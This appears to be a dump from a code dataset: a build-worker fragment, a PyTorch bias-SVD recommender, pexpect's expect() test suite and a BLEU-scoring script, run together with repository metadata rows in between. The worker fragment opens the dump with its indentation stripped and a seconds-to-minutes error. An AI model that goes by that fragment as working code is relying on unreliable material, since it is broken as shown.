def import_organizations(self):
organizations = Organization.objects.filter(import_enabled=True, worker_pool=self.pool_obj)
for org in organizations:
with transaction.atomic():
try:
org = organizations.select_for_update(nowait=True).get(pk=org.pk)
repo_importer = ImportManager(org)
repo_importer.do_import()
org.save()
except DatabaseError:
traceback.print_exc()
# -------------------------------------------------------------------------
def schedule_builds(self):
Scheduler().go()
# -------------------------------------------------------------------------
def body(self):
"""
Main block, all exceptions are caught.
"""
self.import_organizations()
self.cleanup_orphaned_builds()
self.schedule_builds()
build = self.find_build(build_id=self.build_id)
if build:
self.time_counter = datetime.now(tz=timezone.utc)
LOG.debug("building: %d, project: %s" % (build.id, build.project.name))
BuildLord(build).go()
self.build_counter = self.build_counter - 1
if self.build_counter == 0:
LOG.debug("requested max build count per worker limit reached, exiting")
sys.exit(0)
else:
now = datetime.now(tz=timezone.utc)
delta = now - self.time_counter
if (self.max_wait_minutes > 0) and (delta.total_seconds() * 60 > self.max_wait_minutes):
LOG.debug("no build has occured in %s minutes, exiting" % self.max_wait_minutes)
sys.exit(0)
| 35.675926 | 132 | 0.522969 |
795516a21bc2d4bd31c9e1552ab0cbb2fe374c8a | 1,755 | py | Python | models/MatrixFct.py | Rigel-Everlasting/ID2211DataMining | 44f6038fee91a124a5f1ebed4d100fae2af2ec0e | [
"MIT"
] | null | null | null | models/MatrixFct.py | Rigel-Everlasting/ID2211DataMining | 44f6038fee91a124a5f1ebed4d100fae2af2ec0e | [
"MIT"
] | null | null | null | models/MatrixFct.py | Rigel-Everlasting/ID2211DataMining | 44f6038fee91a124a5f1ebed4d100fae2af2ec0e | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding:utf-8 -*-
# @author: JamieJ
# @license: Apache Licence
# @file: MatrixFct.py
# @time: 2021/05/10
# @contact: mingj@kth,se
# @software: PyCharm
# May the Force be with you.
from Data import *
import numpy as np
from scipy.sparse import coo_matrix
from scipy import sparse
from torch.nn import Module
import torch.nn as nn
import torch
import torch.nn.functional as F
class biasSVD(Module):
    """Matrix factorization (SVD with bias terms) built on embedding layers.

    Predicted rating = <user_vec, item_vec> + user_bias + item_bias + overall_bias,
    where the user bias models each user's rating habits and the item bias
    models an item's overall rating level unrelated to any particular user.
    """

    def __init__(self, user_num, item_num, embed_size):
        """
        :param user_num: number of distinct users (rows of the user tables)
        :param item_num: number of distinct items (rows of the item tables)
        :param embed_size: dimensionality of the latent factor vectors
        """
        super(biasSVD, self).__init__()
        self.userEmbd = nn.Embedding(user_num, embed_size)
        self.itemEmbd = nn.Embedding(item_num, embed_size)
        self.userBias = nn.Embedding(user_num, 1)
        self.itemBias = nn.Embedding(item_num, 1)
        # Global offset shared by every (user, item) pair.
        self.overall_bias = nn.Parameter(torch.Tensor([0]))

    def forward(self, user_idx, item_idx):
        """Return predicted ratings for aligned (user, item) index pairs.

        :param user_idx: LongTensor of user indices, shape (batch,)
        :param item_idx: LongTensor of item indices, shape (batch,)
        :return: FloatTensor of predicted ratings, shape (batch,)
        """
        user_embedding = self.userEmbd(user_idx)
        # BUG FIX: items must be looked up in the *item* embedding table.
        # The original used self.userEmbd here, which left self.itemEmbd
        # untrained/unused and raised an index error for any item index
        # >= user_num.
        item_embedding = self.itemEmbd(item_idx)
        user_bias = self.userBias(user_idx)
        item_bias = self.itemBias(item_idx)
        bias = user_bias + item_bias + self.overall_bias
        # Per-pair dot product of the latent factors, plus all bias terms.
        predictions = torch.sum(torch.mul(user_embedding, item_embedding), dim=1) + bias.flatten()
        return predictions
795518ab2fc803f4ba31f8dc696f97b405f6dbda | 22,207 | py | Python | tests/test_expect.py | AlexThurston/pexpect | c694853403716ace2754cc1e039bf35ecdc17db6 | [
"0BSD"
] | null | null | null | tests/test_expect.py | AlexThurston/pexpect | c694853403716ace2754cc1e039bf35ecdc17db6 | [
"0BSD"
] | null | null | null | tests/test_expect.py | AlexThurston/pexpect | c694853403716ace2754cc1e039bf35ecdc17db6 | [
"0BSD"
] | null | null | null | #!/usr/bin/env python
'''
PEXPECT LICENSE
This license is approved by the OSI and FSF as GPL-compatible.
http://opensource.org/licenses/isc-license.txt
Copyright (c) 2012, Noah Spurrier <noah@noah.org>
PERMISSION TO USE, COPY, MODIFY, AND/OR DISTRIBUTE THIS SOFTWARE FOR ANY
PURPOSE WITH OR WITHOUT FEE IS HEREBY GRANTED, PROVIDED THAT THE ABOVE
COPYRIGHT NOTICE AND THIS PERMISSION NOTICE APPEAR IN ALL COPIES.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
'''
import multiprocessing
import unittest
import subprocess
import time
import signal
import sys
import os
import pexpect
from . import PexpectTestCase
from .utils import no_coverage_env
# Many of these test cases blindly assume that sequential directory
# listings of the /bin directory will yield the same results.
# This may not be true, but seems adequate for testing now.
# I should fix this at some point.
# Translation table mapping each byte value to itself when its repr() is a
# bare printable character (length 3, e.g. "'a'") and to '.' otherwise;
# consumed by hex_dump() via s.translate(FILTER).
# NOTE(review): this is a Python-2 style 256-char str table; Python 3
# bytes.translate() requires a 256-byte table -- confirm which interpreter
# this module is expected to run under.
FILTER=''.join([(len(repr(chr(x)))==3) and chr(x) or '.' for x in range(256)])
def hex_dump(src, length=16):
    """Return a classic hex dump of *src*: offset, hex bytes, ASCII column.

    Accepts bytes (the type the surrounding tests produce) or str, which is
    treated byte-wise via latin-1.  Bytes outside printable ASCII
    (0x20..0x7E) are rendered as '.' in the ASCII column.

    Bug fix: the original used ``xrange`` (NameError on Python 3) and
    ``ord(x)`` / ``s.translate(FILTER)``, which assume iterating *src*
    yields one-character strings; on Python 3, iterating bytes yields ints.
    """
    if isinstance(src, str):
        src = src.encode('latin-1', 'replace')
    result = []
    for i in range(0, len(src), length):
        chunk = src[i:i + length]
        hexa = ' '.join("%02X" % b for b in chunk)
        printable = ''.join(chr(b) if 0x20 <= b <= 0x7E else '.' for b in chunk)
        result.append("%04X %-*s %s\n" % (i, length * 3, hexa, printable))
    return ''.join(result)
def hex_diff(left, right):
    """Render the differing hex-dump rows of *left* and *right* side by side.

    Each mismatching row pair is shown as '< left-row' over '> right-row'.
    Rows beyond the length of the shorter dump are ignored (zip semantics).
    """
    left_rows = hex_dump(left).splitlines()
    right_rows = hex_dump(right).splitlines()
    mismatches = []
    for row_a, row_b in zip(left_rows, right_rows):
        if row_a != row_b:
            mismatches.append('< %s\n> %s' % (row_a, row_b))
    return '\n' + '\n'.join(mismatches)
class ExpectTestCase (PexpectTestCase.PexpectTestCase):
    '''Exercises pexpect.spawn expect()/expect_exact(): pattern ordering,
    echo toggling, before/after bookkeeping, EOF/TIMEOUT indices, and
    greediness.  Most tests drive a real child process ("cat", "ls", or a
    helper script), so they depend on a POSIX environment.'''
    def test_expect_basic (self):
        p = pexpect.spawn('cat', echo=False, timeout=5)
        p.sendline (b'Hello')
        p.sendline (b'there')
        p.sendline (b'Mr. Python')
        p.expect (b'Hello')
        p.expect (b'there')
        p.expect (b'Mr. Python')
        p.sendeof ()
        p.expect (pexpect.EOF)
    def test_expect_exact_basic (self):
        p = pexpect.spawn('cat', echo=False, timeout=5)
        p.sendline (b'Hello')
        p.sendline (b'there')
        p.sendline (b'Mr. Python')
        p.expect_exact (b'Hello')
        p.expect_exact (b'there')
        p.expect_exact (b'Mr. Python')
        p.sendeof ()
        p.expect_exact (pexpect.EOF)
    def test_expect_ignore_case(self):
        '''This test that the ignorecase flag will match patterns
        even if case is different using the regex (?i) directive.
        '''
        p = pexpect.spawn('cat', echo=False, timeout=5)
        p.sendline (b'HELLO')
        p.sendline (b'there')
        p.expect (b'(?i)hello')
        p.expect (b'(?i)THERE')
        p.sendeof ()
        p.expect (pexpect.EOF)
    def test_expect_ignore_case_flag(self):
        '''This test that the ignorecase flag will match patterns
        even if case is different using the ignorecase flag.
        '''
        p = pexpect.spawn('cat', echo=False, timeout=5)
        p.ignorecase = True
        p.sendline (b'HELLO')
        p.sendline (b'there')
        p.expect (b'hello')
        p.expect (b'THERE')
        p.sendeof ()
        p.expect (pexpect.EOF)
    def test_expect_order (self):
        '''This tests that patterns are matched in the same order as given in the pattern_list.
        (Or does it? Doesn't it also pass if expect() always chooses
        (one of the) the leftmost matches in the input? -- grahn)
        ... agreed! -jquast, the buffer ptr isn't forwarded on match, see first two test cases
        '''
        p = pexpect.spawn('cat', echo=False, timeout=5)
        self._expect_order(p)
    def test_expect_order_exact (self):
        '''Like test_expect_order(), but using expect_exact().
        '''
        p = pexpect.spawn('cat', echo=False, timeout=5)
        p.expect = p.expect_exact
        self._expect_order(p)
    # Shared driver: sends four lines + EOF, then checks which list entry
    # matches first as the buffer is consumed incrementally.
    def _expect_order (self, p):
        p.sendline (b'1234')
        p.sendline (b'abcd')
        p.sendline (b'wxyz')
        p.sendline (b'7890')
        p.sendeof ()
        index = p.expect ([
            b'1234',
            b'abcd',
            b'wxyz',
            pexpect.EOF,
            b'7890' ])
        assert index == 0, (index, p.before, p.after)
        index = p.expect ([
            b'54321',
            pexpect.TIMEOUT,
            b'1234',
            b'abcd',
            b'wxyz',
            pexpect.EOF], timeout=5)
        assert index == 3, (index, p.before, p.after)
        index = p.expect ([
            b'54321',
            pexpect.TIMEOUT,
            b'1234',
            b'abcd',
            b'wxyz',
            pexpect.EOF], timeout=5)
        assert index == 4, (index, p.before, p.after)
        index = p.expect ([
            pexpect.EOF,
            b'abcd',
            b'wxyz',
            b'7890' ])
        assert index == 3, (index, p.before, p.after)
        index = p.expect ([
            b'abcd',
            b'wxyz',
            b'7890',
            pexpect.EOF])
        assert index == 3, (index, p.before, p.after)
    def test_expect_setecho_off(self):
        '''This tests that echo may be toggled off.
        '''
        p = pexpect.spawn('cat', echo=True, timeout=5)
        try:
            self._expect_echo_toggle(p)
        except IOError:
            # setecho()/waitnoecho() raise IOError on Solaris ptys.
            if sys.platform.lower().startswith('sunos'):
                if hasattr(unittest, 'SkipTest'):
                    raise unittest.SkipTest("Not supported on this platform.")
                return 'skip'
            raise
    def test_expect_setecho_off_exact(self):
        p = pexpect.spawn('cat', echo=True, timeout=5)
        p.expect = p.expect_exact
        try:
            self._expect_echo_toggle(p)
        except IOError:
            if sys.platform.lower().startswith('sunos'):
                if hasattr(unittest, 'SkipTest'):
                    raise unittest.SkipTest("Not supported on this platform.")
                return 'skip'
            raise
    def test_waitnoecho(self):
        " Tests setecho(False) followed by waitnoecho() "
        p = pexpect.spawn('cat', echo=False, timeout=5)
        try:
            p.setecho(False)
            p.waitnoecho()
        except IOError:
            if sys.platform.lower().startswith('sunos'):
                if hasattr(unittest, 'SkipTest'):
                    raise unittest.SkipTest("Not supported on this platform.")
                return 'skip'
            raise
    def test_waitnoecho_order(self):
        ''' This tests that we can wait on a child process to set echo mode.
        For example, this tests that we could wait for SSH to set ECHO False
        when asking of a password. This makes use of an external script
        echo_wait.py. '''
        p1 = pexpect.spawn('%s echo_wait.py' % self.PYTHONBIN)
        start = time.time()
        try:
            p1.waitnoecho(timeout=10)
        except IOError:
            if sys.platform.lower().startswith('sunos'):
                if hasattr(unittest, 'SkipTest'):
                    raise unittest.SkipTest("Not supported on this platform.")
                return 'skip'
            raise
        end_time = time.time() - start
        assert end_time < 10 and end_time > 2, "waitnoecho did not set ECHO off in the expected window of time."
        # test that we actually timeout and return False if ECHO is never set off.
        p1 = pexpect.spawn('cat')
        start = time.time()
        retval = p1.waitnoecho(timeout=4)
        end_time = time.time() - start
        # NOTE(review): the check is "> 3" but the failure message says
        # "longer than 2 seconds" -- message and threshold disagree.
        assert end_time > 3, "waitnoecho should have waited longer than 2 seconds. retval should be False, retval=%d"%retval
        assert retval==False, "retval should be False, retval=%d"%retval
        # This one is mainly here to test default timeout for code coverage.
        p1 = pexpect.spawn('%s echo_wait.py' % self.PYTHONBIN)
        start = time.time()
        p1.waitnoecho()
        end_time = time.time() - start
        assert end_time < 10, "waitnoecho did not set ECHO off in the expected window of time."
    def test_expect_echo (self):
        '''This tests that echo is on by default.
        '''
        p = pexpect.spawn('cat', echo=True, timeout=5)
        self._expect_echo(p)
    def test_expect_echo_exact (self):
        '''Like test_expect_echo(), but using expect_exact().
        '''
        p = pexpect.spawn('cat', echo=True, timeout=5)
        p.expect = p.expect_exact
        self._expect_echo(p)
    # Shared driver: with echo on, each line should be seen twice (tty echo
    # plus cat's output).
    def _expect_echo (self, p):
        p.sendline (b'1234') # Should see this twice (once from tty echo and again from cat).
        index = p.expect ([
            b'1234',
            b'abcd',
            b'wxyz',
            pexpect.EOF,
            pexpect.TIMEOUT])
        assert index == 0, "index="+str(index)+"\n"+p.before
        index = p.expect ([
            b'1234',
            b'abcd',
            b'wxyz',
            pexpect.EOF])
        assert index == 0, "index="+str(index)
    # Shared driver: verifies output counts change as tty echo is toggled
    # off and back on.
    def _expect_echo_toggle(self, p):
        p.sendline (b'1234') # Should see this twice (once from tty echo and again from cat).
        index = p.expect ([
            b'1234',
            b'abcd',
            b'wxyz',
            pexpect.EOF,
            pexpect.TIMEOUT])
        assert index == 0, "index="+str(index)+"\n"+p.before
        index = p.expect ([
            b'1234',
            b'abcd',
            b'wxyz',
            pexpect.EOF])
        assert index == 0, "index="+str(index)
        p.setecho(0) # Turn off tty echo
        p.waitnoecho()
        p.sendline (b'abcd') # Now, should only see this once.
        p.sendline (b'wxyz') # Should also be only once.
        index = p.expect ([
            pexpect.EOF,
            pexpect.TIMEOUT,
            b'abcd',
            b'wxyz',
            b'1234'])
        assert index == 2, "index="+str(index)
        index = p.expect ([
            pexpect.EOF,
            b'abcd',
            b'wxyz',
            b'7890'])
        assert index == 2, "index="+str(index)
        p.setecho(1) # Turn on tty echo
        p.sendline (b'7890') # Should see this twice.
        index = p.expect ([pexpect.EOF,b'abcd',b'wxyz',b'7890'])
        assert index == 3, "index="+str(index)
        index = p.expect ([pexpect.EOF,b'abcd',b'wxyz',b'7890'])
        assert index == 3, "index="+str(index)
        p.sendeof()
    def test_expect_index (self):
        '''This tests that mixed list of regex strings, TIMEOUT, and EOF all
        return the correct index when matched.
        '''
        p = pexpect.spawn('cat', echo=False, timeout=5)
        self._expect_index(p)
    def test_expect_index_exact (self):
        '''Like test_expect_index(), but using expect_exact().
        '''
        p = pexpect.spawn('cat', echo=False, timeout=5)
        p.expect = p.expect_exact
        self._expect_index(p)
    # Shared driver for the two tests above.
    def _expect_index (self, p):
        p.sendline (b'1234')
        index = p.expect ([b'abcd',b'wxyz',b'1234',pexpect.EOF])
        assert index == 2, "index="+str(index)
        p.sendline (b'abcd')
        index = p.expect ([pexpect.TIMEOUT,b'abcd',b'wxyz',b'1234',pexpect.EOF])
        assert index == 1, "index="+str(index)+str(p)
        p.sendline (b'wxyz')
        index = p.expect ([b'54321',pexpect.TIMEOUT,b'abcd',b'wxyz',b'1234',pexpect.EOF])
        assert index == 3, "index="+str(index) # Expect 'wxyz'
        p.sendline (b'$*!@?')
        index = p.expect ([b'54321',pexpect.TIMEOUT,b'abcd',b'wxyz',b'1234',pexpect.EOF],
                timeout=1)
        assert index == 1, "index="+str(index) # Expect TIMEOUT
        p.sendeof ()
        index = p.expect ([b'54321',pexpect.TIMEOUT,b'abcd',b'wxyz',b'1234',pexpect.EOF])
        assert index == 5, "index="+str(index) # Expect EOF
    def test_expect (self):
        # Compare a line-by-line expect() read of `ls -l /bin` against the
        # same command run through subprocess.
        the_old_way = subprocess.Popen(args=['ls', '-l', '/bin'],
                stdout=subprocess.PIPE).communicate()[0].rstrip()
        p = pexpect.spawn('ls -l /bin')
        the_new_way = b''
        while 1:
            i = p.expect ([b'\n', pexpect.EOF])
            the_new_way = the_new_way + p.before
            if i == 1:
                break
        the_new_way = the_new_way.rstrip()
        # Normalize line endings before comparing pty output to pipe output.
        the_new_way = the_new_way.replace(b'\r\n', b'\n'
                ).replace(b'\r', b'\n').replace(b'\n\n', b'\n').rstrip()
        the_old_way = the_old_way.replace(b'\r\n', b'\n'
                ).replace(b'\r', b'\n').replace(b'\n\n', b'\n').rstrip()
        assert the_old_way == the_new_way, hex_diff(the_old_way, the_new_way)
    def test_expect_exact (self):
        the_old_way = subprocess.Popen(args=['ls', '-l', '/bin'],
                stdout=subprocess.PIPE).communicate()[0].rstrip()
        p = pexpect.spawn('ls -l /bin')
        the_new_way = b''
        while 1:
            i = p.expect_exact ([b'\n', pexpect.EOF])
            the_new_way = the_new_way + p.before
            if i == 1:
                break
        the_new_way = the_new_way.replace(b'\r\n', b'\n'
                ).replace(b'\r', b'\n').replace(b'\n\n', b'\n').rstrip()
        the_old_way = the_old_way.replace(b'\r\n', b'\n'
                ).replace(b'\r', b'\n').replace(b'\n\n', b'\n').rstrip()
        assert the_old_way == the_new_way, hex_diff(the_old_way, the_new_way)
        # expect_exact must treat '.?' literally, not as a regex.
        p = pexpect.spawn('echo hello.?world')
        i = p.expect_exact(b'.?')
        self.assertEqual(p.before, b'hello')
        self.assertEqual(p.after, b'.?')
    def test_expect_eof (self):
        the_old_way = subprocess.Popen(args=['/bin/ls', '-l', '/bin'],
                stdout=subprocess.PIPE).communicate()[0].rstrip()
        p = pexpect.spawn('/bin/ls -l /bin')
        p.expect(pexpect.EOF) # This basically tells it to read everything. Same as pexpect.run() function.
        the_new_way = p.before
        the_new_way = the_new_way.replace(b'\r\n', b'\n'
                ).replace(b'\r', b'\n').replace(b'\n\n', b'\n').rstrip()
        the_old_way = the_old_way.replace(b'\r\n', b'\n'
                ).replace(b'\r', b'\n').replace(b'\n\n', b'\n').rstrip()
        assert the_old_way == the_new_way, hex_diff(the_old_way, the_new_way)
    def test_expect_timeout (self):
        p = pexpect.spawn('cat', timeout=5)
        p.expect(pexpect.TIMEOUT) # This tells it to wait for timeout.
        self.assertEqual(p.after, pexpect.TIMEOUT)
    def test_unexpected_eof (self):
        p = pexpect.spawn('ls -l /bin')
        try:
            p.expect('_Z_XY_XZ') # Probably never see this in ls output.
        except pexpect.EOF:
            pass
        else:
            self.fail ('Expected an EOF exception.')
    def test_buffer_interface(self):
        p = pexpect.spawn('cat', timeout=5)
        p.sendline (b'Hello')
        p.expect (b'Hello')
        assert len(p.buffer)
        p.buffer = b'Testing'
        p.sendeof ()
    def test_before_across_chunks(self):
        # https://github.com/pexpect/pexpect/issues/478
        child = pexpect.spawn(
            '''/bin/bash -c "openssl rand -base64 {} | head -500 | nl --number-format=rz --number-width=5 2>&1 ; echo 'PATTERN!!!'"'''.format(1024 * 1024 * 2),
            searchwindowsize=128
        )
        child.expect(['PATTERN'])
        assert len(child.before.splitlines()) == 500
        assert child.after == b'PATTERN'
        assert child.buffer == b'!!!\r\n'
    # Shared driver: checks p.before/p.after bookkeeping while expecting
    # through the output of list100.py (prints list(range(100))).
    def _before_after(self, p):
        p.timeout = 5
        p.expect(b'5')
        self.assertEqual(p.after, b'5')
        assert p.before.startswith(b'[0, 1, 2'), p.before
        p.expect(b'50')
        self.assertEqual(p.after, b'50')
        assert p.before.startswith(b', 6, 7, 8'), p.before[:20]
        assert p.before.endswith(b'48, 49, '), p.before[-20:]
        p.expect(pexpect.EOF)
        self.assertEqual(p.after, pexpect.EOF)
        assert p.before.startswith(b', 51, 52'), p.before[:20]
        assert p.before.endswith(b', 99]\r\n'), p.before[-20:]
    def test_before_after(self):
        '''This tests expect() for some simple before/after things.
        '''
        p = pexpect.spawn('%s -Wi list100.py' % self.PYTHONBIN, env=no_coverage_env())
        self._before_after(p)
    def test_before_after_exact(self):
        '''This tests some simple before/after things, for
        expect_exact(). (Grahn broke it at one point.)
        '''
        p = pexpect.spawn('%s -Wi list100.py' % self.PYTHONBIN, env=no_coverage_env())
        # mangle the spawn so we test expect_exact() instead
        p.expect = p.expect_exact
        self._before_after(p)
    # Shared driver: drives an interactive Python prompt and checks which
    # of two candidate patterns wins.
    def _ordering(self, p):
        p.timeout = 20
        p.expect(b'>>> ')
        p.sendline('list(range(4*3))')
        self.assertEqual(p.expect([b'5,', b'5,']), 0)
        p.expect(b'>>> ')
        p.sendline(b'list(range(4*3))')
        self.assertEqual(p.expect([b'7,', b'5,']), 1)
        p.expect(b'>>> ')
        p.sendline(b'list(range(4*3))')
        self.assertEqual(p.expect([b'5,', b'7,']), 0)
        p.expect(b'>>> ')
        p.sendline(b'list(range(4*5))')
        self.assertEqual(p.expect([b'2,', b'12,']), 0)
        p.expect(b'>>> ')
        p.sendline(b'list(range(4*5))')
        self.assertEqual(p.expect([b'12,', b'2,']), 1)
    def test_ordering(self):
        '''This tests expect() for which pattern is returned
        when many may eventually match. I (Grahn) am a bit
        confused about what should happen, but this test passes
        with pexpect 2.1.
        '''
        p = pexpect.spawn(self.PYTHONBIN)
        self._ordering(p)
    def test_ordering_exact(self):
        '''This tests expect_exact() for which pattern is returned
        when many may eventually match. I (Grahn) am a bit
        confused about what should happen, but this test passes
        for the expect() method with pexpect 2.1.
        '''
        p = pexpect.spawn(self.PYTHONBIN)
        # mangle the spawn so we test expect_exact() instead
        p.expect = p.expect_exact
        self._ordering(p)
    # Shared driver: tie-breaking rules when several patterns could match.
    def _greed(self, expect):
        # End at the same point: the one with the earliest start should win
        self.assertEqual(expect([b'3, 4', b'2, 3, 4']), 1)
        # Start at the same point: first pattern passed wins
        self.assertEqual(expect([b'5,', b'5, 6']), 0)
        # Same pattern passed twice: first instance wins
        self.assertEqual(expect([b'7, 8', b'7, 8, 9', b'7, 8']), 0)
    def _greed_read1(self, expect):
        # Here, one has an earlier start and a later end. When processing
        # one character at a time, the one that finishes first should win,
        # because we don't know about the other match when it wins.
        # If maxread > 1, this behaviour is currently undefined, although in
        # most cases the one that starts first will win.
        self.assertEqual(expect([b'1, 2, 3', b'2,']), 1)
    def test_greed(self):
        p = pexpect.spawn(self.PYTHONBIN + ' list100.py')
        self._greed(p.expect)
        p = pexpect.spawn(self.PYTHONBIN + ' list100.py', maxread=1)
        self._greed_read1(p.expect)
    def test_greed_exact(self):
        p = pexpect.spawn(self.PYTHONBIN + ' list100.py')
        self._greed(p.expect_exact)
        p = pexpect.spawn(self.PYTHONBIN + ' list100.py', maxread=1)
        self._greed_read1(p.expect_exact)
def test_bad_arg(self):
p = pexpect.spawn('cat')
with self.assertRaisesRegexp(TypeError, '.*must be one of'):
p.expect(1)
with self.assertRaisesRegexp(TypeError, '.*must be one of'):
p.expect([1, b'2'])
with self.assertRaisesRegexp(TypeError, '.*must be one of'):
p.expect_exact(1)
with self.assertRaisesRegexp(TypeError, '.*must be one of'):
p.expect_exact([1, b'2'])
    def test_timeout_none(self):
        # timeout=None means wait indefinitely; both expect flavors and EOF
        # must still work.
        p = pexpect.spawn('echo abcdef', timeout=None)
        p.expect('abc')
        p.expect_exact('def')
        p.expect(pexpect.EOF)
    def test_signal_handling(self):
        '''
        This tests the error handling of a signal interrupt (usually a
        SIGWINCH generated when a window is resized), but in this test, we
        are substituting an ALARM signal as this is much easier for testing
        and is treated the same as a SIGWINCH.
        To ensure that the alarm fires during the expect call, we are
        setting the signal to alarm after 1 second while the spawned process
        sleeps for 2 seconds prior to sending the expected output.
        '''
        def noop(x, y):
            pass
        signal.signal(signal.SIGALRM, noop)
        p1 = pexpect.spawn('%s sleep_for.py 2' % self.PYTHONBIN, timeout=5)
        p1.expect('READY')
        signal.alarm(1)
        # The alarm interrupts this expect() mid-wait; it must resume and
        # still find the pattern rather than raising.
        p1.expect('END')
    def test_stdin_closed(self):
        '''
        Ensure pexpect continues to operate even when stdin is closed
        '''
        class Closed_stdin_proc(multiprocessing.Process):
            def run(self):
                sys.__stdin__.close()
                cat = pexpect.spawn('cat')
                cat.sendeof()
                cat.expect(pexpect.EOF)
        proc = Closed_stdin_proc()
        proc.start()
        proc.join()
        # exitcode 0 means the child ran spawn/expect without raising.
        assert proc.exitcode == 0
    def test_stdin_stdout_closed(self):
        '''
        Ensure pexpect continues to operate even when stdin and stdout is closed
        '''
        class Closed_stdin_stdout_proc(multiprocessing.Process):
            def run(self):
                sys.__stdin__.close()
                sys.__stdout__.close()
                cat = pexpect.spawn('cat')
                cat.sendeof()
                cat.expect(pexpect.EOF)
        proc = Closed_stdin_stdout_proc()
        proc.start()
        proc.join()
        assert proc.exitcode == 0
if __name__ == '__main__':
    # unittest.main() runs the tests and calls sys.exit(), so the old
    # trailing "suite = unittest.makeSuite(...)" line was unreachable dead
    # code (and makeSuite is deprecated, removed in Python 3.13); dropped.
    unittest.main()
| 36.827529 | 159 | 0.570226 |
795518ab8b585c9ecd2d51b20a561639c2251386 | 4,650 | py | Python | models/language_translation/tensorflow/transformer_mlperf/training/fp32/transformer/compute_bleu.py | yangw1234/models-1 | 7e7f484f4f22c760f9a5af836f57a3602b4fa7a6 | [
"Apache-2.0"
] | 357 | 2019-01-23T23:54:30.000Z | 2022-03-31T05:32:25.000Z | models/language_translation/tensorflow/transformer_mlperf/training/fp32/transformer/compute_bleu.py | yangw1234/models-1 | 7e7f484f4f22c760f9a5af836f57a3602b4fa7a6 | [
"Apache-2.0"
] | 65 | 2019-02-06T15:35:35.000Z | 2022-03-25T09:56:48.000Z | models/language_translation/tensorflow/transformer_mlperf/training/fp32/transformer/compute_bleu.py | yangw1234/models-1 | 7e7f484f4f22c760f9a5af836f57a3602b4fa7a6 | [
"Apache-2.0"
] | 164 | 2019-02-06T15:05:57.000Z | 2022-03-31T11:48:14.000Z | # Copyright 2018 MLBenchmark Group. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Script to compute official BLEU score.
Source:
https://github.com/tensorflow/tensor2tensor/blob/master/tensor2tensor/utils/bleu_hook.py
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import re
import sys
import unicodedata
import six
import tensorflow as tf
from utils import metrics
class UnicodeRegex(object):
"""Ad-hoc hack to recognize all punctuation and symbols."""
def __init__(self):
punctuation = self.property_chars("P")
self.nondigit_punct_re = re.compile(r"([^\d])([" + punctuation + r"])")
self.punct_nondigit_re = re.compile(r"([" + punctuation + r"])([^\d])")
self.symbol_re = re.compile("([" + self.property_chars("S") + "])")
def property_chars(self, prefix):
return "".join(six.unichr(x) for x in range(sys.maxunicode)
if unicodedata.category(six.unichr(x)).startswith(prefix))
uregex = UnicodeRegex()
def bleu_tokenize(string):
r"""Tokenize a string following the official BLEU implementation.
See https://github.com/moses-smt/mosesdecoder/'
'blob/master/scripts/generic/mteval-v14.pl#L954-L983
In our case, the input string is expected to be just one line
and no HTML entities de-escaping is needed.
So we just tokenize on punctuation and symbols,
except when a punctuation is preceded and followed by a digit
(e.g. a comma/dot as a thousand/decimal separator).
Note that a numer (e.g. a year) followed by a dot at the end of sentence
is NOT tokenized,
i.e. the dot stays with the number because `s/(\p{P})(\P{N})/ $1 $2/g`
does not match this case (unless we add a space after each sentence).
However, this error is already in the original mteval-v14.pl
and we want to be consistent with it.
Args:
string: the input string
Returns:
a list of tokens
"""
string = uregex.nondigit_punct_re.sub(r"\1 \2 ", string)
string = uregex.punct_nondigit_re.sub(r" \1 \2", string)
string = uregex.symbol_re.sub(r" \1 ", string)
return string.split()
def bleu_wrapper(ref_filename, hyp_filename, case_sensitive=False):
"""Compute BLEU for two files (reference and hypothesis translation)."""
ref_lines = tf.io.gfile.GFile(ref_filename).read().strip().splitlines()
hyp_lines = tf.io.gfile.GFile(hyp_filename).read().strip().splitlines()
if len(ref_lines) != len(hyp_lines):
raise ValueError("Reference and translation files have different number of "
"lines.")
if not case_sensitive:
ref_lines = [x.lower() for x in ref_lines]
hyp_lines = [x.lower() for x in hyp_lines]
ref_tokens = [bleu_tokenize(x) for x in ref_lines]
hyp_tokens = [bleu_tokenize(x) for x in hyp_lines]
return metrics.compute_bleu(ref_tokens, hyp_tokens) * 100
def main(unused_argv):
if FLAGS.bleu_variant is None or "uncased" in FLAGS.bleu_variant:
score = bleu_wrapper(FLAGS.reference, FLAGS.translation, False)
print("Case-insensitive results:", score)
if FLAGS.bleu_variant is None or "cased" in FLAGS.bleu_variant:
score = bleu_wrapper(FLAGS.reference, FLAGS.translation, True)
print("Case-sensitive results:", score)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--translation", "-t", type=str, default=None, required=True,
help="[default: %(default)s] File containing translated text.",
metavar="<T>")
parser.add_argument(
"--reference", "-r", type=str, default=None, required=True,
help="[default: %(default)s] File containing reference translation",
metavar="<R>")
parser.add_argument(
"--bleu_variant", "-bv", type=str, choices=["uncased", "cased"],
nargs="*", default=None,
help="Specify one or more BLEU variants to calculate (both are "
"calculated by default. Variants: \"cased\" or \"uncased\".",
metavar="<BV>")
FLAGS, unparsed = parser.parse_known_args()
main(sys.argv)
| 36.328125 | 88 | 0.696559 |
795518c97aab9e1a01e938e0e77af6a8f762ca08 | 1,168 | py | Python | cpu.py | ArkAngeL43/cpu-info | d7da58718ca7ea85174e321e870a085856154184 | [
"MIT"
